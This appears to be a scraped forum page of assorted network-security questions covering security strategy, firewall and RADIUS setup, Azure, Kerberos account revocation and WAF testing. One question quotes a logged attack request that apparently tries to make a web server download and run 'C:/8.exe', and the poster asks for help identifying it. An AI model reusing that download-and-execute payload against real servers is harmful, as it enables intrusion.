Network Security

Network security consists of the policies adopted to prevent and monitor unauthorized access, misuse, modification, or denial of a computer network and network-accessible resources. Network security involves the authorization of access to data in a network, and covers a variety of computer networks used for conducting transactions and communications among businesses, government agencies and individuals. Networks can be private, such as within a company, or open to public access.


Hi guys

I'm currently trying to put a plan together for senior management for a strategy for their infrastructure and security. I have only just been hired for the project. My role is to provide leadership for the infrastructure and security teams. I know exactly what I need to do, but my issue is that I'm trying to put this into a structured plan to follow in steps, and articulating this properly has been a bit of a challenge. The purpose of the plan is to liaise with important stakeholders to understand the vision/mission of the business goals in order for IT to better support them.

At the moment, I've gone and met people in the teams and asked them about how things work, the infrastructure and the security in place. But, that's not part of a structured method/plan.

For example, I am setting the plan together in phases. In the first phase, I want it to be the understanding phase. So something like 'meet with direct reports'. Then 'understand from direct reports, their roles and responsibilities by spending two hours in the first week with them'.

Then something like 'exploring vulnerabilities across all verticals to identify shortfalls affecting productivity....' (or anything similar).

The purpose is to expand this into phases, so that I can come up with a conclusion and show senior people as to what I will do in the next X number of months.

Do you guys have any plans you created or know of any good structure that is out there which can be …

Are there Checkpoint Gaia & Fortigate hardening guidelines?

If there are, can you point me to where to download them? If there are none, a paper from the principals recommending not to harden them would be appreciated.
Need advice for preventing malware from taking advantage of USB ports on a computer/server, etc. Are Chromebooks vulnerable?

Also, is there a safe way to determine if a USB device is compromised? Or to check if your computer has been infected?
I'm a little overwhelmed with all the security features to help secure an Azure environment and VMs.

Our developers are creating a web app that, currently, will live on a single VM and we may have a few VMs. In the future as the application grows we will separate the services.

So far I have enabled the Security Center and I was thinking of enabling JIT Access. I found a PS script that will create an RBAC role where I can put specific users in, and then another PS script so that they can enable ports for a specific time, but our developers use Linux and I don't know if that script will work even with PowerShell Core installed on Ubuntu.

They have Rapid7 and Qualys endpoints for vulnerability scanning but I'm not sure if that is needed. I was trying to look for an IPS/IDS endpoint but I am not familiar with what's on Azure nor if it will be expensive.

I'm looking for practical solutions. I've read the Azure docs and they can get a little confusing.

Thank you,
A client has an Excel file that would use URLDownloadFile to download an image from a webpage.

The file worked for an entire year, but last week, after a network change at his work, his file no longer downloads the image.

He can access the image by pasting the link in internet explorer, but the code just won't import anymore.

I apologize as I can't paste his code or the websites he uses, so I am wondering if you can list network changes that can cause this and some bulletproof code that you would use.
Hi guys

So I'm about to work on a project for a firm and one of the people I am going to be interviewing is a CISO. I will be directing the strategy and implementation of the infrastructure and security. The CISO will report directly to me. This individual has highlighted the following areas as their strengths:

IT Security & Information Assurance
Data Protection, EU GDPR, Privacy & Online Safety
Governance and regulatory compliance
Security Incident Response, e-litigation & RCA
CyberEssentials, NIS directive, CoCo, PCI DSS

I have some questions of my own. But I wanted broader perspectives from people like you. So if you had the opportunity to ask some questions from such an individual, what sort of questions would you ask them in order to understand the spectrum of their security understanding/experience?

Thanks for helping
Hi guys

I want to do a course in Cybersecurity with someone who knows their stuff backwards and from whom I could learn a lot. I'm a member of Pluralsight, which is great too. But I have worked with some talented people and you can learn exponentially with an absolute 'don' who knows how and what to teach. Do you guys know of names of individuals, whether on here or in and around London, who you would highly recommend learning from and who offer their time to do so?


Pending our hardware arrival & clearing change control, we're considering the above free proxy. If anyone has used it, mind sharing:

a) if it can do whitelisting & ban/blacklisting? Basically I would like to create a whitelist of about 120 trusted websites & then every other website will be banned/barred from access

b) for the 120 sites, may need wildcards in front/back

c) for the barred sites, when users load them, it'll launch a secure browser
I am in the process of changing out a file server. It is the only server on the network.
Access to the internet is through a WatchGuard XM25 appliance.
The domain name is the same, but the DNS has changed. The WatchGuard provided an internet connection for a few minutes, and now there is no internet connection. I can remote into the network with the WatchGuard SSL-VPN utility and access the computers.

Any thoughts on why I cannot access the internet from behind the WatchGuard appliance?

The old server was 2008 R2 and the new server is 2016 Standard.

As far as I understand our current set-up:

We have a WPA2 Enterprise wireless solution. The APs act as RADIUS clients and connecting devices use PEAP to connect valid domain users via RADIUS (currently running on Server 2012 R2) using their domain credentials.

There is a server-side certificate which I believe is used for encrypting the session.

I have been asked to move to a pure certificate based solution (i.e. certificate on both server and client and no more authentication necessary) and I am not sure how best to set this up.  We have our own PKI.

Can anyone point me in the direction of any good quality information about how I would set RADIUS up to work in this way?

I have noticed an unchecked box in Radius that says "Disconnect Clients without Cryptobinding" but I can't find a lot of documentation about what that means and what checking it would change.

I have also noticed that we are using the Domain Users group to validate users, but imagine we could use Domain Computers instead.  How secure would that be?  Does the device actually do some authentication or could another device with the same name connect with that setting?

I've also seen a number of things indicating that MS-CHAP and MS-CHAP-V2 are essentially worthless, so how do I avoid using these?

If anyone can point me at any great documentation for setting something like this up in a more secure way, I would find that really helpful.

Not an expert in these areas, so any …
Active Protection takes the fight to cryptojacking

While there were several headline-grabbing ransomware attacks in 2017, another big threat started appearing at the same time that didn't get the same coverage: illicit cryptomining.

Which is good software for monitoring the network, for example to know which computer is using a lot of data on the network?

Free or paid.
I've noticed that all of my web servers were logging this block below from my host intrusion prevention system.  For privacy, assume this particular webserver has a dns name of'','C:/8.exe');start%20C:/8.exe

Is this bot just a crafted URL request being thrown at my webserver in hopes that it is vulnerable to running a PowerShell script that will make it reach out and download + execute something? Which exploit would this be targeting?
My employer wants the ability to disable an AD account and have assurance that the end user's access to email and network resources is immediately or quickly revoked. We tested this earlier this morning and discovered that although email access to Exchange is almost immediately unavailable, the end user still has access to critical and sensitive data through mapped drives. I've got the impression this is because the end user still has a Kerberos ticket cached on their PC. What is the best practice to mitigate this risk? Should we modify the Kerberos ticket lifetime on the 2012 R2 Domain Controller, or use some other method? Thanks!
Our employees on the road have laptops with an LTE connection and we want to narrow their internet usage to only a few sites or categories. I came across this site which seems good but is pricey.

What I like about this site is they have a lot of categories to choose from, which others like windows parental control or NetNanny do not offer.

I would not go with Norton for example, since I don’t want their security firewall.

OpenDNS would be the one I would go with, but in this case it will not work, since you need to use their DNS and with LTE you cannot change the DNS.

Any recommendations?
I am building a lab in my apartment.

I'm a student. I have a ton of Linux servers but no Windows servers. So I have a few questions

1. I am a student. Do I need to pay by the core or do they have a free student license?
2. Which version of Windows server should I get?
3. Will this version have a GUI? Should I use a GUI? I'm very comfortable with the Unix shell. I would like to learn PowerShell but also just want an overview of Windows Server.
4. How do I connect to Windows server from a Linux machine?
5. I want to specialize in network security. What should my goals be running Windows server? What do I need to learn and get a good overview of?

I have added a lot of tags and plan to keep this question open for a while, especially for input from the NetSec people.
I need tools / ways to test our new WAF (to be set up in UAT VLAN) for
a) Brute Force: what are the commands/syntax if I use John the Ripper or any other suggested tool?
b) DDoS volumetric & application
c) OWASP top 10 (eg: XSS, SQL injection, CSRF, Cross-Frame-Site-Forgery/Clickjacking, insecure file upload)
d) Rate-Limiting : can I use the command line browser  'wget' to load a page many times to simulate?
e) any other aspects to test?
f) virtual patching (eg: if a patch is not applied & the WAF has a rule/signature for Wordpress/PHP)

I don't have access to Kali Linux (but possibly an RHEL VM in UAT) to run Metasploit: hopefully there's a Metasploit for RHEL (but do suggest how to use it to test).

When adding an IP to an outside interface on a Cisco ASA, what IP information do I need from my ISP?

I believe it's just a public IP address and subnet mask? Do I need a gateway address?

I need to allow access to a remote ip to be able to manage the config on my Cisco 5506. What's the best way?

Over the last few weeks I've noticed our DNS filter blocking the same address many times, and the address is similar to our domain, which is a little concerning. I'm seeing blocked attempts to access  From what I can tell that looks like a Russian hosting service. DNS lookup shows the IP as run by Webazilla B.V., which from what I can find is in the Netherlands. We do have a techy Russian employee who was my first thought, and after investigating he was using Yandex, which is a Russian browser of some sort. I thought the issue was tied to Yandex, which was installed on three different computers. I removed all instances and the DNS filter logs were clean for a couple of days. Before I went on leave I set up local DNS logging, and when I returned I'm seeing a lot of blocked attempts to the same source. I tried looking through logs on the Cisco firewall but I couldn't recreate the issue to help point me to the culprit. The firewall was reporting our DNS filter IP instead of the questionable IP when I tried recreating the issue. Moving on to the DNS logs, I will attach a sample of the logs, but I'm seeing this from multiple IP addresses on our network now. One computer I re-imaged right before my leave, and another is a laptop whose user I'm pretty certain practices above-average password and security policies. All of the computers on the network are running Kaspersky Endpoint. Any help would be much appreciated!

Notes about computer IPs shown in the logs.
CEOs need to know what they should worry about

Nearly every week during the past few years has featured a headline about the latest data breach, malware attack, ransomware demand, or unrecoverable corporate data loss. Those stories are frequently followed by news that the CEOs at those companies were forced to resign.

I am setting up our infrastructure to enable remote phones on a new phone system we installed. The phone vendor requirements were fairly simple: port forward UDP 443 to a device on our DMZ (the virtual machine). Easy, or so I thought.

Everything looks good from the firewall end. If I plug in the phone, I can see the traffic hit the firewall and be forwarded to the device, let's say is No issues I can see from the firewall end. It's a Barracuda NG F280; I have gone over it over and over with Barracuda support and they see nothing from their end.

The issue is that traffic never hits I have set up a monitoring VM on my DMZ with wireshark, never see the traffic. The VM has a packet monitor built in so I can create packet captures on the interface directly, never see the traffic. If I run a netcat cmd for UDP 443, I see nothing. I see other traffic. If I ping from anywhere else on the network, I see it. There is nothing between this device and the Firewall, except the VMWare hypervisor.

I am at a loss at this point. My Firewall vendor says it isn't on their end, my phone vendor says it isn't on theirs. I believe that to be the truth, but I don't know what else it could be. Does anyone have any ideas? Only thing I can think of is something in VMWare, but I have never seen VMWare block traffic like that before.

Some more info:

Seems localized in some way to port number. If I change my forwarding rule to port 3300 instead…
One of the Big 4 consulting firms has strongly advocated that 2FA be used if we are on O365 Exchange Online, as they had seen quite a few incidents that could have been prevented if users of O365 had used 2FA.

If secure email (eg: HP Voltage & one of those where users have to log in to a portal to retrieve the encrypted emails) is used, will this mitigate such issues and serve as a good replacement for 2FA?

Does O365 offer a secure email feature or add-on (like HP's Voltage)?

We have moved to O365 and the Exchange Online Protection is not very effective. We are planning to go with a 3rd party spam filtering system.

We are an education establishment. Please post any good products that you are aware of.

I'm exploring if Rapid7 can be used to track patch status (what patches are applied on which dates & which ones have been released but are yet to be applied) of our Solaris, RHEL 6/7 & Windows servers, as well as configuring it to do a weekly scan of CIS hardenings (including for Cisco switches/routers).

Any documents/materials on how to configure it to check for patch status & CIS hardenings are much appreciated.
Refer to attached:
Need to clarify the red-text items in the Excel: what are the usual industry-practice settings, like whether "occurs 10 times/minute" is the usual setting, or do hackers usually attempt 5 times/0.5 min?

From our network IPS logs, we have seen variations in attempts (by blacklisted source IP addresses) making 3-10 attempts over various time horizons.

Appreciate any comments/inputs on the red-text items in the attached use cases which we're going to adopt to fine-tune our SIEM/SOC.
Token Based Authentication and the .NET Stack

What can you tell me about the built-in capabilities of the .NET stack to use Token Based Authentication, and also about Token Based Authentication in general?
